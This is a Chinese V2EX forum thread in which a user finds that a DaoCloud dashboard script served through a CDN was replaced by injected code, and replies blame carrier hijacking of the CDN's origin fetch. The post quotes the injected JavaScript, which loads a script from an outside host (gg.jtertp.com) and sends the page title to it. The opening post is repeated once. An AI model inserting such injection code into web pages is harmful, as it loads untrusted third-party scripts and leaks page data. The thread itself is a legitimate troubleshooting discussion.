这是一个创建于 3307 天前的主题,其中的信息可能已经有所发展或是发生改变。
今天访问 DaoCloud 的时候突然控制面板卡吃豆人了,仔细一看发现居然是因为加载了 HTTP 的资源被 Chrome 拦住了,打开控制台发现是这个 JS :
https://dn-daodashboard-prod.qbox.me/app/958e675a.app.js
正常情况应该是一大串,但是我得到的是:
document.write("<script language='javascript' src='http://dn-daodashboard-prod.qbox.me/app/958e675a.app.js?_vv=20080808'></script>");if(top.location==self.location){document.write("<script language='javascript' src='http://gg.jtertp.com:7777/rs/rs.php?src=p0005&t="+encodeURIComponent(document.title)+"&ci=140380449942919'></script>");}
搜了一下发现 gg.jtertp.com 似乎是电信的劫持?感觉真是好奇怪!电信居然已经可以进行 HTTPS 劫持了?!
求各路大神分析原因。。。
PS :证书应该没有问题,是 GeoTrust 的。
PSS :科学上网出国之后无此现象,不挂科学上网同网络环境下 3 台机器不同浏览器均出现这个现象
https://dn-daodashboard-prod.qbox.me/app/958e675a.app.js
正常情况应该是一大串,但是我得到的是:
document.write("<script language='javascript' src='http://dn-daodashboard-prod.qbox.me/app/958e675a.app.js?_vv=20080808'></script>");if(top.location==self.location){document.write("<script language='javascript' src='http://gg.jtertp.com:7777/rs/rs.php?src=p0005&t="+encodeURIComponent(document.title)+"&ci=140380449942919'></script>");}
搜了一下发现 gg.jtertp.com 似乎是电信的劫持?感觉真是好奇怪!电信居然已经可以进行 HTTPS 劫持了?!
求各路大神分析原因。。。
PS :证书应该没有问题,是 GeoTrust 的。
PSS :科学上网出国之后无此现象,不挂科学上网同网络环境下 3 台机器不同浏览器均出现这个现象
 |
1
Laforet 2015-11-04 21:53:07 +08:00
把证书保存出来对比一下。
不过看你的描述应该是那个域名上所有的请求都被劫持到了 http 上才会出现混合内容 |
 |
2
hgc81538 2015-11-04 21:59:22 +08:00
應該是源被劫持了
https://www.v2ex.com/t/212885 |
 |
3
lhbc 2015-11-04 23:34:56 +08:00 via Android
某 CDN 回源被劫持
运营商真变态啊, IDC 之间的网络也搞劫持 运营商为推广全面 https 化真是费尽心机啊 |
 |
4
wzxjohn OP |
|
8
hgc81538 2015-11-05 10:21:39 +08:00 via iPhone
@wzxjohn 用戶請求文件, cdn 沒文件找源, cdn 向源請求文件,運營商劫持通訊, cdn 收到被竄改的內容,包括 header
|
 |
10
Senorsen 2016-11-05 12:00:50 +08:00
可怕,我说怎么最近 daocloud 首页这么卡…
CDN 回源时劫持,真是个厉害的新套路 |
|
11
Senorsen 2016-11-05 12:02:39 +08:00
呃… 居然是个老帖
|
Select Language